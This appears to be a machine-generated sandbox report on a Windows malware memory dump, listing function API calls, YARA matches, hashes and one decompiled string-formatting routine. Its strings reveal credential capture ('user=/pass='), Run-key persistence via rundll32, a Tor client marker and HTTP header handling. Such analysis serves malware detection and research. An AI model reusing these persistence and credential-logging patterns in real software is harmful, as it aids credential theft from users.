Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: 0d972422148ffe760922d6a38b48e3e9cd014b6bbe2c5bc40dd24be79e3f7314
Instruction ID: eae6ec35656d83efec0e818e62982907f11b10061c8d4b7ad24c4bb9df448ce7
Opcode Fuzzy Hash: 0d972422148ffe760922d6a38b48e3e9cd014b6bbe2c5bc40dd24be79e3f7314
Instruction Fuzzy Hash: 49618171924700AFD7209F25D849AABBBF9BF84710F40891EF997D2280EB70D505CF56

Uniqueness

Uniqueness Score: -1.00%

Function 05401000, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 05401032
WaitForSingleObject.KERNEL32(000003AC,00000000), ref: 05401054
ConnectNamedPipe.KERNEL32(?,?), ref: 05401074
GetLastError.KERNEL32 ref: 0540107E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 054010A2
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 054010E5
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 054010EE
WaitForSingleObject.KERNEL32(00000000), ref: 054010F7
CloseHandle.KERNEL32(?), ref: 0540110C
GetLastError.KERNEL32 ref: 05401119
CloseHandle.KERNEL32(?), ref: 05401126
RtlExitUserThread.NTDLL(000000FF), ref: 0540113C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: d39be5fa8d4cc92e73dbfe71c11f658e45d31f34b7c74e77d240043962b898f8
Instruction ID: 9cffc6e136f4ff8c5d6126e3135dcc53aec9773c25900ed108076d2b1520d4f4
Opcode Fuzzy Hash: d39be5fa8d4cc92e73dbfe71c11f658e45d31f34b7c74e77d240043962b898f8
Instruction Fuzzy Hash: 9731EE70418315AFE7248F24CC8A9EFBFAAFB44314F505A2AF5A5D21D0CB309905CB67

Uniqueness

Uniqueness Score: -1.00%

Function 02777D0C, Relevance: 18.1, APIs: 12, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02777D0C(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				WCHAR* _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				WCHAR* _t88;

				_t74 = __ecx;
				_t79 =  *0x277d2ec; // 0x4f39c48
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E02772FF4(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x277c1cc;
				}
				_t44 = E02774D59(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E027775C4(lstrlenW(0x277ead8) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x277ead8) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x277d230; // 0x27ba5a8
						_t18 = _t75 + 0x277ead8; // 0x530025
						wsprintfW(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E027775C4(lstrlenW(0x277ebf8) + _a8 + _t57 + _t58 + lstrlenW(0x277ebf8) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E02774C31(_v16);
						} else {
							_t64 =  *0x277d230; // 0x27ba5a8
							_t31 = _t64 + 0x277ebf8; // 0x73006d
							wsprintfW(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E02774C31(_v8);
				}
				return _v20;
			}

0x02777d0c
0x02777d14
0x02777d1a
0x02777d2a
0x02777d2d
0x02777d34
0x02777d37
0x02777d39
0x02777d39
0x02777d42
0x02777d49
0x02777d4c
0x02777d52
0x02777d5c
0x02777d65
0x02777d6c
0x02777d7a
0x02777d8c
0x02777d93
0x02777d96
0x02777d9f
0x02777db1
0x02777dbf
0x02777dc7
0x02777dcc
0x02777dcf
0x02777dda
0x02777df1
0x02777df5
0x02777e28
0x02777df7
0x02777dfa
0x02777e02
0x02777e0d
0x02777e15
0x02777e1d
0x02777e21
0x02777e21
0x02777df5
0x02777e30
0x02777e35
0x02777e3c

APIs

GetTickCount.KERNEL32 ref: 02777D21
lstrlen.KERNEL32(00000000,80000002), ref: 02777D5C
lstrlen.KERNEL32(?), ref: 02777D65
lstrlen.KERNEL32(00000000), ref: 02777D6C
lstrlenW.KERNEL32(80000002), ref: 02777D7A
lstrlenW.KERNEL32(0277EAD8), ref: 02777D83
wsprintfW.USER32 ref: 02777DBF
lstrlen.KERNEL32(?), ref: 02777DC7
lstrlen.KERNEL32(?), ref: 02777DCF
lstrlenW.KERNEL32(?), ref: 02777DDA
lstrlenW.KERNEL32(0277EBF8), ref: 02777DE3
wsprintfW.USER32 ref: 02777E0D

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: c1c815f80436edbcb71d6a65360db6b53d48d994d3472b7593757a78395ab0a5
Instruction ID: befbf048141fc0b3913a4898778a43b87ff4480315764661f0e1dc67e84594ce
Opcode Fuzzy Hash: c1c815f80436edbcb71d6a65360db6b53d48d994d3472b7593757a78395ab0a5
Instruction Fuzzy Hash: 99313D72D00219AFCF12AFA4CC44D9EBFB6FF48354B058495E914A7221DB35DA25DF90

Uniqueness

Uniqueness Score: -1.00%

Function 054161E1, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0541621A
memset.NTDLL ref: 0541622E

Part of subcall function 0542207B: RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
Part of subcall function 0542207B: RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
Part of subcall function 0542207B: RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
Part of subcall function 0542207B: RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

GetCurrentThreadId.KERNEL32 ref: 054162BD
GetCurrentThread.KERNEL32 ref: 054162D0
RtlEnterCriticalSection.NTDLL(05958D20), ref: 05416377
Sleep.KERNEL32(0000000A), ref: 05416381
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 054163A7
HeapFree.KERNEL32(00000000,?), ref: 054163D5
HeapFree.KERNEL32(00000000,00000018), ref: 054163E8

Strings

TorClient, xrefs: 05416240

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: a57dffad5ea89cc12e9fe111f9fae379736fa50dac0acd526361a01606305179
Instruction ID: 20d9808c20cbe0d9056a53808866253d4462138209a8a46d14b4f7b98836c684
Opcode Fuzzy Hash: a57dffad5ea89cc12e9fe111f9fae379736fa50dac0acd526361a01606305179
Instruction Fuzzy Hash: BE517BB1518315AFD720DF25D8809ABBBF9FB48344F81492EF985D2610DB30D909CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 05415BE4, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 05415BFC
RtlEnterCriticalSection.NTDLL(00000000), ref: 05415C3D
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 05415C51
CloseHandle.KERNEL32(?,?,?,00000000), ref: 05415CA6
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 05415CF0
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05415CFE
RtlLeaveCriticalSection.NTDLL(00000000), ref: 05415D09

Part of subcall function 05415478: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0541548C
Part of subcall function 05415478: memcpy.NTDLL(00000000,?,00000000,00000000,00000000,?,0541A732,00000000,00000000,00000001,?,05425798,00000020,00000000,?,00000000), ref: 054154B5
Part of subcall function 05415478: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 054154DE
Part of subcall function 05415478: RegCloseKey.ADVAPI32(00000000,?,0541A732,00000000,00000000,00000001,?,05425798,00000020,00000000,?,00000000,?,00000000,00000000), ref: 05415509

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 05415C47
rundll32, xrefs: 05415CAF, 05415CB4
Client32, xrefs: 05415C0D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 3181710096-668865654
Opcode ID: b69fc1e9c6cdbaa73ca2533b353f1493271325c87b3e8dcafcdf88e52240cd74
Instruction ID: c20fa770c543fe94e0c77476395689252c205e960f41a55442ec4b13b87a87eb
Opcode Fuzzy Hash: b69fc1e9c6cdbaa73ca2533b353f1493271325c87b3e8dcafcdf88e52240cd74
Instruction Fuzzy Hash: FB31E331611220ABDB359F65DC89FEFBBB9FB84A50F640456FD02E2140EB7089419EA8

Uniqueness

Uniqueness Score: -1.00%

Function 0541A777, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 05420507: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05420539
Part of subcall function 05420507: HeapFree.KERNEL32(00000000,00000000,?,?,0541A793,?,00000022,00000000,?,00000000), ref: 0542055E

Part of subcall function 0540B9F0: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,0541A7B4,?,?,?,?,?,00000022,00000000), ref: 0540BA2A
Part of subcall function 0540B9F0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0541A7B4,?,?,?,?,?,00000022,00000000,?,00000000), ref: 0540BA76

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,?,00000000), ref: 0541A7E9
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,?,00000000), ref: 0541A7F1
lstrlen.KERNEL32(?,?,00000000), ref: 0541A7FB
RtlAllocateHeap.NTDLL(00000000,?), ref: 0541A810
wsprintfA.USER32 ref: 0541A845
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 0541A867
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0541A87C
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0541A889
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,?,00000000), ref: 0541A897

Strings

URL: %suser=%spass=%s, xrefs: 0541A83F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: d5d575d07992fb33509dd6c862db75ad01215fe5d1e46b4d02e4ea7173d76c38
Instruction ID: 777f2b156f35a7b097b25835ed3c0972664898fff1b020fa96d7287690988e32
Opcode Fuzzy Hash: d5d575d07992fb33509dd6c862db75ad01215fe5d1e46b4d02e4ea7173d76c38
Instruction Fuzzy Hash: 0E31D471A04325BBCB21AF66CC45EDFBFE9FF44250F41092AF944E2290DB70C815DA9A

Uniqueness

Uniqueness Score: -1.00%

Function 05421E05, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0541DFD3,?,?,00000000), ref: 05421E11
_aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 05421E27
_snwprintf.NTDLL ref: 05421E4C
CreateFileMappingW.KERNEL32(000000FF,0542E0E4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 05421E68
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0541DFD3,?), ref: 05421E7A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 05421E91
CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0541DFD3), ref: 05421EB2
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0541DFD3,?), ref: 05421EBA

Strings

Local\, xrefs: 05421E3B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: eb9331f78f44dde632288652e0cb76c4c8b0ccdffefdfd9d76151f9bda8f89a0
Instruction ID: 4868441e6552d0854fe33c0f9b6171db94638fe93a5bb94aefbdfba0bd1c00fb
Opcode Fuzzy Hash: eb9331f78f44dde632288652e0cb76c4c8b0ccdffefdfd9d76151f9bda8f89a0
Instruction Fuzzy Hash: 9C212772640234BBD720EB54DC06FDE7BB9AF44B10FA14122F605E72D0DB709505CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0540D3E0, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,75145520), ref: 0540D416
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0540D42B
RegCreateKeyA.ADVAPI32(80000001,?), ref: 0540D453
HeapFree.KERNEL32(00000000,?), ref: 0540D494
HeapFree.KERNEL32(00000000,00000000), ref: 0540D4A4
RtlAllocateHeap.NTDLL(00000000,0541521A), ref: 0540D4B7
RtlAllocateHeap.NTDLL(00000000,0541521A), ref: 0540D4C6
HeapFree.KERNEL32(00000000,00000000,?,0541521A,00000000,?,?,?), ref: 0540D510
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0541521A,00000000,?,?,?), ref: 0540D534
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0541521A,00000000,?,?), ref: 0540D559
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0541521A,00000000,?,?), ref: 0540D56E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 36ffdcfaec351100deee6a21340d26a761fe69ef6041576b24491f34761dcd54
Instruction ID: bd01128000fb302177a59851e545be19c1cf1f63cf540e0c60c7558bbda4bd42
Opcode Fuzzy Hash: 36ffdcfaec351100deee6a21340d26a761fe69ef6041576b24491f34761dcd54
Instruction Fuzzy Hash: 2751D0B1C00229EFCF119FD4D9858EEBFB9FB08388F60806AF905A2250D7319A55DF64

Uniqueness

Uniqueness Score: -1.00%

Function 0540F35B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,0000002C,7748D3B0,00000000,00000000,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000,75144D40), ref: 0540F380
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C), ref: 0540F393
StrTrimA.SHLWAPI(00000000,20000920,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C), ref: 0540F3B6
StrTrimA.SHLWAPI(00000001,20000920,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C), ref: 0540F3C5
lstrlen.KERNEL32(00000000,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C), ref: 0540F3FA
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0540F40D
lstrcpy.KERNEL32(00000004,00000000), ref: 0540F42B
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,054128D4,00000000,Scr,00000000,00000000,00000001,00000000), ref: 0540F451

Strings

Scr, xrefs: 0540F435, 0540F487

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr
API String ID: 1974185407-1633706383
Opcode ID: 00b42c17d0501a86f8320e83ca3983356f7f28527dc55139c80a4c76db8a2d07
Instruction ID: 05f6c9d496067cef10a37df3fd01f92d1010288616595d779d8f340caea4141c
Opcode Fuzzy Hash: 00b42c17d0501a86f8320e83ca3983356f7f28527dc55139c80a4c76db8a2d07
Instruction Fuzzy Hash: D331C071A14224FEDB20DF64CC45EEF7FB8FF14740F608066B809A7250DA709906DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05403B50, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 05403B6A
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05403B7F
memset.NTDLL ref: 05403B8C
HeapFree.KERNEL32(00000000,00000000), ref: 05403BA9
memcpy.NTDLL(?,?,?), ref: 05403BCA

Strings

Content-Length:, xrefs: 05403BFA
Transfer-Encoding:, xrefs: 05403C27
Referer: , xrefs: 05403C48
chun, xrefs: 05403C38

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: 4a29e12c65b0df6dffaf39615a49c65b26d81ddb6c84335fd72aef0e8817a5e7
Instruction ID: 7e8a187dc97ef4d4fe12fda5e81b452a2116da003db4ace9769e06382892657f
Opcode Fuzzy Hash: 4a29e12c65b0df6dffaf39615a49c65b26d81ddb6c84335fd72aef0e8817a5e7
Instruction Fuzzy Hash: 0F31BA31604715AFD730AF26C845B97BBF9FF04614F21882AE94ADA6A0CB70E805CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0540505D, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05405078
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 05405129

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 054050C6
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 054050D8
GetLastError.KERNEL32(?,?,?,?), ref: 054050F7
FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 05405109
GetLastError.KERNEL32(?,?,?,?), ref: 05405111

Strings

WABOpen, xrefs: 054050D2
Software\Microsoft\WAB\DLLPath, xrefs: 05405069

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: de7cbf284dccdfd5d9810908a46a489fc49bac508e0dd7a4d177e3c74d281ef7
Instruction ID: c8c920d00009a807a7140b9c6486295c7e0f419762d7f2d6bba19af0d687bcfb
Opcode Fuzzy Hash: de7cbf284dccdfd5d9810908a46a489fc49bac508e0dd7a4d177e3c74d281ef7
Instruction Fuzzy Hash: 2421D332D10224FFDB21ABA59C89CEFBFB9EB84210B6451B3F812E6251E6714D01DF60

Uniqueness

Uniqueness Score: -1.00%

Function 054236ED, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,05425D1F,00000000,?,?,0542E098), ref: 05423705
StrChrA.SHLWAPI(00000001,00000020,?,?,?,05425D1F,00000000,?,?,0542E098), ref: 05423716

Part of subcall function 05411386: lstrlen.KERNEL32(?,?,00000000,00000000,?,05403C55,?,Referer: ,00000014), ref: 05411398
Part of subcall function 05411386: StrChrA.SHLWAPI(?,0000000D,?,05403C55,?,Referer: ,00000014), ref: 054113D0

RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 0542374F
memcpy.NTDLL(00000000,http://,00000007,?,?,?,05425D1F,00000000,?), ref: 05423775
memcpy.NTDLL(00000000,0542E098,0542E098,00000000,http://,00000007,?,?,?,05425D1F,00000000,?), ref: 05423784
memcpy.NTDLL(0542E098,?,?,00000000,0542E098,0542E098,00000000,http://,00000007,?,?,?,05425D1F,00000000,?), ref: 05423796

Strings

http://, xrefs: 0542376A
https://, xrefs: 05423761, 05423773
Host:, xrefs: 05423726

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: 18e173271ebf273ba772fcdec67df978ecce045fab3bccf32575198c57b3c7e1
Instruction ID: 27ee03e028ca103253124f096be47ebcdf4e36e664dc65272132ff1c54b43fd6
Opcode Fuzzy Hash: 18e173271ebf273ba772fcdec67df978ecce045fab3bccf32575198c57b3c7e1
Instruction Fuzzy Hash: 4D21A4B1A00224BBDF219F99CC85FDABBB8EF44644F948152FD04DB250D674DD458B90

Uniqueness

Uniqueness Score: -1.00%

Function 05406590, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0541E426,00000000,00000000,0542E2A0,?,?,05412348,0541E426,00000000,0541E426,0542E280), ref: 054065A3
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 054065B1
wsprintfA.USER32 ref: 054065C6
RegCreateKeyA.ADVAPI32(80000001,0542E280,00000000), ref: 054065DE
lstrlen.KERNEL32(?), ref: 054065ED
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 054065FB
RegCloseKey.ADVAPI32(?), ref: 05406606
HeapFree.KERNEL32(00000000,00000000), ref: 05406615

Strings

@%s@, xrefs: 054065C0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID: @%s@
API String ID: 1575615994-4128794767
Opcode ID: d3c9eebcf4586d6957709b13ac31b726878a0b4dca9adff66177a7842e5e31f3
Instruction ID: 377e5720afe5ebbbab6cdb382ce0a73ac64faaf532715f5e283777cd425f8f49
Opcode Fuzzy Hash: d3c9eebcf4586d6957709b13ac31b726878a0b4dca9adff66177a7842e5e31f3
Instruction Fuzzy Hash: F3019276910128BFEB251B94EC4AEEA3F3DFB44740F914021FA01E2190DFB28D21DB64

Uniqueness

Uniqueness Score: -1.00%

Function 05407FBD, Relevance: 15.3, APIs: 10, Instructions: 274memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05408034
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 05408053
GetLastError.KERNEL32 ref: 05408310
RtlEnterCriticalSection.NTDLL(?), ref: 05408320
RtlLeaveCriticalSection.NTDLL(?), ref: 05408331
RtlExitUserThread.NTDLL(?), ref: 0540833F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: 94ba3d3c92a8a6aa6585c5a164a7854719127be8c0a1d8b57ecb7c12d44d5d71
Instruction ID: cc7d0eef477ee486e758d592713796e6981ea1cc7ce82c5e103703f3bc39adf8
Opcode Fuzzy Hash: 94ba3d3c92a8a6aa6585c5a164a7854719127be8c0a1d8b57ecb7c12d44d5d71
Instruction Fuzzy Hash: 5AA13670900719AFEB349F21CE88AEA7BBAFF08305F60457AF916D2290DB719845CF51

Uniqueness

Uniqueness Score: -1.00%

Function 054203F2, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 05404BB6: memset.NTDLL ref: 05404BD8
Part of subcall function 05404BB6: CloseHandle.KERNEL32(?,?,?,?,?), ref: 05404C85

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 05420439
CloseHandle.KERNEL32(?), ref: 05420445
PathFindFileNameW.SHLWAPI(?), ref: 05420455
lstrlenW.KERNEL32(00000000), ref: 0542045F
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05420470
wcstombs.NTDLL ref: 05420481
lstrlen.KERNEL32(?), ref: 0542048E
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 054204C4
HeapFree.KERNEL32(00000000,00000000), ref: 054204D6
DeleteFileW.KERNEL32(?), ref: 054204E4

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 3613b0700fd6b556fcdfb2d30cc09e0280fd9d858d02eb63567986d88ed7c47b
Instruction ID: c69b4986d101f3b00a317d0317a55aebdc78a349cda86549b01b1a9348cbca82
Opcode Fuzzy Hash: 3613b0700fd6b556fcdfb2d30cc09e0280fd9d858d02eb63567986d88ed7c47b
Instruction Fuzzy Hash: FB313C71910229EFCF21AFA5DD8D8EF7FB9FF04341B91806AF905A2210CB319A11DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05403EAE, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,05414D82,?,00000000,05417B1E,00000000,00000000), ref: 05403EC2

Part of subcall function 0540D597: InterlockedExchange.KERNEL32(?,000000FF), ref: 0540D59E

WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,05417B1E,00000000,00000000), ref: 05403EDC
CloseHandle.KERNEL32(?,?,00000000,05417B1E,00000000,00000000), ref: 05403EE5
CloseHandle.KERNEL32(?,0000003C,?,00000000,05417B1E,00000000,00000000), ref: 05403EF3
RtlEnterCriticalSection.NTDLL(00000008), ref: 05403EFF
RtlLeaveCriticalSection.NTDLL(00000008), ref: 05403F28
Sleep.KERNEL32(000001F4,05417B1E,00000000,00000000), ref: 05403F37
CloseHandle.KERNEL32(?), ref: 05403F44
LocalFree.KERNEL32(?), ref: 05403F52
RtlDeleteCriticalSection.NTDLL(00000008), ref: 05403F5C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 7b6595aeb3ebc55972d18b0070f41f992d19867e23eb39f0389431dbda75395e
